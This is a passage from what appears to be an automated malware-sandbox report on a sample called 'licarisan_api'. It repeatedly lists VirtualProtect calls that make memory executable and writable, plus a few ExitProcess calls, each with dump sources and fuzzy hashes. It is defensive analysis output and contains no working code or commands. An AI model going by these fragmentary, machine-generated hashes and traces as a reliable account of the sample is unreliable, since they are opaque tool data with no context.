                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?), ref: 004201B8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?), ref: 004201B8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B28FD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 6e3c9b783f1c8fee03bd68efdbf831efe4fa4bbea802bb85b962f353675cb138
                                    • Instruction ID: e3536490f3e2b11a6b7dbaa3fed20e74532b46d08f419d83f96687498955bbfe
                                    • Opcode Fuzzy Hash: 6e3c9b783f1c8fee03bd68efdbf831efe4fa4bbea802bb85b962f353675cb138
                                    • Instruction Fuzzy Hash: 8621F4B1D062549FEB148B10DCA4BEE7B79EB81310F1481FAD90DD6242D6395EC5CF51
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: c51248f09cd72283f6fe3c92b97dbc9e3220737b63d9fd9c11fd55dcd3bc7142
                                    • Instruction ID: 544dc8f57cb46dba4c9ab08a7e62fd53437b695382b03e7df50d24ca14616a4a
                                    • Opcode Fuzzy Hash: c51248f09cd72283f6fe3c92b97dbc9e3220737b63d9fd9c11fd55dcd3bc7142
                                    • Instruction Fuzzy Hash: D221C0F2E145146FF3688A21DC59FBB7769EBD1310F14C2BEE24A566C0D93C5AC18A11
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?), ref: 007BD1E3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516539906.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 007BD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: cb4c1feed9e8ab14e498cbe3f0291ccc4f186e5160fd8feb8c014e21ad0f6f51
                                    • Instruction ID: 0fa3b86dc8ad801094045cc45745c01bb07f4ad295e62eaef5fb441aadfc9bc6
                                    • Opcode Fuzzy Hash: cb4c1feed9e8ab14e498cbe3f0291ccc4f186e5160fd8feb8c014e21ad0f6f51
                                    • Instruction Fuzzy Hash: 3721B0B2D0911C9BEB31CA18CC947EA77B9EB40310F1181EAE50DE6240E63D9EC5CF41
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?), ref: 007BD1E3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516539906.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 007BD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: ef4b198b5a2a94d1afc0625931c7ebb526579f6ebde9eac28d64bf6e4cec3310
                                    • Instruction ID: 00d0b374457bcd5ed0d9606cb0be7b9f20f9d001c87ab70ffd589b276895cebe
                                    • Opcode Fuzzy Hash: ef4b198b5a2a94d1afc0625931c7ebb526579f6ebde9eac28d64bf6e4cec3310
                                    • Instruction Fuzzy Hash: 0621A1B1D0911C9FEB31CA18CC94BEA7BB9EB40311F1481EAE50DE6240E67D9E85CF41
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 4b743c446bfedc348ad90e6a62f34e2fd71acfe2ff84e10be9bb2e1280c1a52c
                                    • Instruction ID: 408aa76805c5df04b21313daa7dffcb9563dce8a0eb7d8935314e90863150db0
                                    • Opcode Fuzzy Hash: 4b743c446bfedc348ad90e6a62f34e2fd71acfe2ff84e10be9bb2e1280c1a52c
                                    • Instruction Fuzzy Hash: C11104F2D145086FF7688A21EC55FBB3669E7C1310F04C2BEE24E165C0D93C5AC08B51
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B28FD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 64faf9716ebfafaa2c50823ba0d4f61eba65ab225aefa3ad6a3a7b3122b2be6d
                                    • Instruction ID: 7de588258ae618b715662185d29251894bf6cfef6455d193f61272af606000e3
                                    • Opcode Fuzzy Hash: 64faf9716ebfafaa2c50823ba0d4f61eba65ab225aefa3ad6a3a7b3122b2be6d
                                    • Instruction Fuzzy Hash: 3321D1B2E062589FEB24CB14DC94BED77B5FF85310F0441EAD80DA6282CA385EC58F10
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0080FDEA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 927871b5f0281f19efd2c136cf81d0f6fe2f14744662c919d68fb38f78c933bc
                                    • Instruction ID: 5221dc0c4641891c92e724ae07400daafb217fc5018d0930a546f4a591f1a124
                                    • Opcode Fuzzy Hash: 927871b5f0281f19efd2c136cf81d0f6fe2f14744662c919d68fb38f78c933bc
                                    • Instruction Fuzzy Hash: 3C1122A2A08108AAF7744A24DD49BF77779FBC0318F10C1BEE60A5AC85C37D0A869911
                                    APIs
                                    • ExitProcess.KERNEL32(00000000), ref: 00437BB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: 571276edcc534549a83365dfe23df2dc37f99d4a80bcb0eb9cb31d81955f3edf
                                    • Instruction ID: 646dfcdc70eee91063db88894666cc5d4c4047e85ba599eee2a12b591002009e
                                    • Opcode Fuzzy Hash: 571276edcc534549a83365dfe23df2dc37f99d4a80bcb0eb9cb31d81955f3edf
                                    • Instruction Fuzzy Hash: 601100F2D045046BF7248A10DC5ABEA7774EB88714F1480FFE94E52680E63C6EC18E22
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?), ref: 007BD1E3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516539906.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 007BD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: d6c40dd0e7ca687b2e8b8ac6b25433044e47742aa1f53f4d3bafdc2ea71a689d
                                    • Instruction ID: 2a5ff533f8d5d584a2338d7bb7172dda7bf0f23ecf23f71b4879acbd49d8d64a
                                    • Opcode Fuzzy Hash: d6c40dd0e7ca687b2e8b8ac6b25433044e47742aa1f53f4d3bafdc2ea71a689d
                                    • Instruction Fuzzy Hash: 2C21A2B1D0911C9FEB31CA68DC94BEA77B8EB44311F1441EAE50DE6240E6399F85CF41
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: bdb8aea21a4cb6bfb0e977599fe7d2eb8626027c0e7df650af6ff75e88c5adc9
                                    • Instruction ID: 2ace93a5d6c33d2c46a5669e3c26b928176cc818fceff40523d5a05fd7932122
                                    • Opcode Fuzzy Hash: bdb8aea21a4cb6bfb0e977599fe7d2eb8626027c0e7df650af6ff75e88c5adc9
                                    • Instruction Fuzzy Hash: C42172B1D156189FD7A9CB50CC94FB6B778EB84315F2081EED54B5A280DA386EC0DF12
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 338b44fe340f13122142fafbf4942da94926d540e2e7de9f997a5a9d91911dc8
                                    • Instruction ID: 9210651c51fa8130da55caca2d6c30c85dac58d59de9790bb6e65e304811c39b
                                    • Opcode Fuzzy Hash: 338b44fe340f13122142fafbf4942da94926d540e2e7de9f997a5a9d91911dc8
                                    • Instruction Fuzzy Hash: 0211B1709045688FDB798B20DCD4BFAB7B4EB85305F2082EED54B5A181CA381EC1CF26
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?), ref: 007FA422
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 27b40cba31297443125013a48a68abcbb9545012ddfd3115df1035a972cf1093
                                    • Instruction ID: cc28e87b3a1f63867b976277e051feca64d45de12b6ede671d07a7ba3beef9b4
                                    • Opcode Fuzzy Hash: 27b40cba31297443125013a48a68abcbb9545012ddfd3115df1035a972cf1093
                                    • Instruction Fuzzy Hash: EC11C4F090425DAFDB248B65CD849FAB774EF41340F1041FEDA4956381E679AD868B12
                                    APIs
                                    • ExitProcess.KERNEL32(00000000), ref: 00437BB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: fdadeb56a7fee1d41a01a609606f364b414a363698e19b925f87e7e1a6cfe0ee
                                    • Instruction ID: d1e90c05c289c9bbcd95f7da87344f31754be87a64ef52ff4a9679d0bc0f234e
                                    • Opcode Fuzzy Hash: fdadeb56a7fee1d41a01a609606f364b414a363698e19b925f87e7e1a6cfe0ee
                                    • Instruction Fuzzy Hash: B92195B1D091A98FEB30DB24CC947E9BB71BF46319F1441EBC499A6282D2345E85CF85
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?), ref: 007FA422
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 1ea211b48a1c89fc4a169d404989650432a079080c0ebfeb6980fea38ed6cff9
                                    • Instruction ID: fdd3ee6f72d8bc555d22e06641de1327b6ea9c4c02bab4dde29e9a7c87c5002b
                                    • Opcode Fuzzy Hash: 1ea211b48a1c89fc4a169d404989650432a079080c0ebfeb6980fea38ed6cff9
                                    • Instruction Fuzzy Hash: FD11E3F090425DAFEB208B55CC849FAB774EF41340F1041FEEA4996241D679AD868E12
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?), ref: 007FA422
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 893f70fde454d93de69ae348da3fbf791ad5e53566c5318d9151d33108bd914f
                                    • Instruction ID: 44e78fdbe2531972f61e2e1d702980f19c0fcf198fcce99a75da20e15e0b3d15
                                    • Opcode Fuzzy Hash: 893f70fde454d93de69ae348da3fbf791ad5e53566c5318d9151d33108bd914f
                                    • Instruction Fuzzy Hash: A111E0F090425DAFEB248B55CC849FAB778EF41300F1042FEEA4A56381D679AD868E12
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?), ref: 007FA422
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 7c8cd6cbc07008870cdc8be8f7a27a6c2c1a12a594882f275c6620190876c6e1
                                    • Instruction ID: f65040f322e208d8a4e5fb34ab66b49660eb9df1cd76627b20274bdfbe20e248
                                    • Opcode Fuzzy Hash: 7c8cd6cbc07008870cdc8be8f7a27a6c2c1a12a594882f275c6620190876c6e1
                                    • Instruction Fuzzy Hash: A811E0F090425DAFEB208B55CC849FAB778EF41300F1042FEEA4956281D679AD868E12
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0080FDEA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 0f61c7533a9ed5db5217512bd0b5353ae6fa13c545893ade00c2d2f5154c41ee
                                    • Instruction ID: 639d24fc9e00882859f7d46a607e05dcfaab4cf845ce86f0c7e62fc566a89617
                                    • Opcode Fuzzy Hash: 0f61c7533a9ed5db5217512bd0b5353ae6fa13c545893ade00c2d2f5154c41ee
                                    • Instruction Fuzzy Hash: C30126A3A04209AAF7788915DD49BF7767AE7C0304F10C1BAD70E59CC6D7BD0AC69901
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 2d758493a800ff5ed907641fb4911ff4cd27f37b9be651f213e3e3c995dc6322
                                    • Instruction ID: 2f2a036ca516bed3f23ef4a3a1ce2bec7ef95dd1acdf535aaf08a26f0696467d
                                    • Opcode Fuzzy Hash: 2d758493a800ff5ed907641fb4911ff4cd27f37b9be651f213e3e3c995dc6322
                                    • Instruction Fuzzy Hash: C211C4B1A152588FD7A9CB10CC98BBA7B74FB84305F1081EED54A5A281DB3D5EC1CF12
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 5d8e62d4489b4a2f86286a4ac34fdc9179b70693b7bd8040dca664bdb425ac8a
                                    • Instruction ID: 4a32ec62c452979f31821f0de2abd10bf33d49d1f86362d43250b0c9baad9ccf
                                    • Opcode Fuzzy Hash: 5d8e62d4489b4a2f86286a4ac34fdc9179b70693b7bd8040dca664bdb425ac8a
                                    • Instruction Fuzzy Hash: B4118F70905668CFDB79CB10DCD5BFAB7B5AB85305F2082DED55A5A280CA385EC08F26
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B28FD
                                    • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B29EE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 99503a097a4855acdbc0c0142371ca1b7218e624da992396bd25416d1143577b
                                    • Instruction ID: 7324e0fe5d03cb4de16e14cd26b637836410137e257035f935a6ff9fd45dd29b
                                    • Opcode Fuzzy Hash: 99503a097a4855acdbc0c0142371ca1b7218e624da992396bd25416d1143577b
                                    • Instruction Fuzzy Hash: 760126F2E062509FF7118A10DC10BEA7779EBD2311F0440FAE90D9A282D67C5AC58B61
                                    APIs
                                    • ExitProcess.KERNEL32(00000000), ref: 00437BB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: 1c1ea27179360d8fc005d0709d6fbb5ab4f1613aef04fd4b226c55596f6f9c6b
                                    • Instruction ID: 515c29123b53164fc97d8d4b4ab525464833d5dc8302d7a3d072130b1e86ca9b
                                    • Opcode Fuzzy Hash: 1c1ea27179360d8fc005d0709d6fbb5ab4f1613aef04fd4b226c55596f6f9c6b
                                    • Instruction Fuzzy Hash: EB115EF1E052599FEB24CA00DC44B9EB775FB88308F2040EAD50D17340D739AE81DE55
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?), ref: 007BD1E3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516539906.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 007BD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 09da3c507bc4c008466d62611a4f99ad47ea44e04e1986ac161acb0f0e75b6ca
                                    • Instruction ID: 9fcb9d9c531f1a44d03a9e846ba2ae3260e05081634f1f3d6ffad01567ddb2a9
                                    • Opcode Fuzzy Hash: 09da3c507bc4c008466d62611a4f99ad47ea44e04e1986ac161acb0f0e75b6ca
                                    • Instruction Fuzzy Hash: 4301B1B2D09128ABEB70CA24CC44BEB77B9EF84310F1481E9E50CD7640E63A9F85CE51
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: b4c51e14b98baae9b8ef15363d0be41bc8157a04e9682debb406ca4106c524ac
                                    • Instruction ID: 48030b9c63a57d2dbb573a5555d6008b003ed73e9deb5a72d40ee2234545a58f
                                    • Opcode Fuzzy Hash: b4c51e14b98baae9b8ef15363d0be41bc8157a04e9682debb406ca4106c524ac
                                    • Instruction Fuzzy Hash: A80184B19146288FDBA9CB10CCD4FEAB778EB84305F1081EED64A5A280DB385EC0DF51
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?), ref: 007FA422
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 5a95a51d355137f77ca6193f677d4269b582a44763b3039a874559aecb7d1863
                                    • Instruction ID: 4f2661efae5c9d07909c23dc6a121acbcdba07a8e08bc6e9739a32a39e55c247
                                    • Opcode Fuzzy Hash: 5a95a51d355137f77ca6193f677d4269b582a44763b3039a874559aecb7d1863
                                    • Instruction Fuzzy Hash: 2F014CF190425DAFDB208B64CCC85F6B374EF01340F0002FEDA495A281E679AD468B53
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?), ref: 007FA422
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 401991dd49af9bbb6e739afffc6fc26a2f4c3d90d781dd3b9f5ba90632234f40
                                    • Instruction ID: 6a07117ff5def00e82d7aca505fbbebe02fa39ee271ad987b62e6b2f6fa99a5f
                                    • Opcode Fuzzy Hash: 401991dd49af9bbb6e739afffc6fc26a2f4c3d90d781dd3b9f5ba90632234f40
                                    • Instruction Fuzzy Hash: 36014CB150415D9FDB208B68CCC85F9B775EF41340F0002FEDA495A282D6796D86CB12
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 681036dbc0da77f3324c5c3c6743064ac2725d7347521c1cfd8a2a6bc389f192
                                    • Instruction ID: 6d2e2d22ce492961b6dc822c9dc7a0de0b3d5f4406ee9cd6ed06e181c8aeaf88
                                    • Opcode Fuzzy Hash: 681036dbc0da77f3324c5c3c6743064ac2725d7347521c1cfd8a2a6bc389f192
                                    • Instruction Fuzzy Hash: 270175F1914559AFF728CB20DC55FAA7774FB54300F0582EEE649A6280D6399F808F50
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 7cf324f6faa8f252d6f97d536eb3e3c3ebae3fb4b8b860743794def3778a5ad2
                                    • Instruction ID: 12965f72277f4f03397aa10ec5806a8cf3b4a3c1625c3fcce174c97a998fa2b1
                                    • Opcode Fuzzy Hash: 7cf324f6faa8f252d6f97d536eb3e3c3ebae3fb4b8b860743794def3778a5ad2
                                    • Instruction Fuzzy Hash: AFF0A4B2A15214AAE7698B50DCD4FF77B68E744314F1046EEA60B5A1C09B3D5EC08E26
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 8cf01369379f08a5fbe8c04a8959705451e4ad461a12f1ff44f0861ef515add0
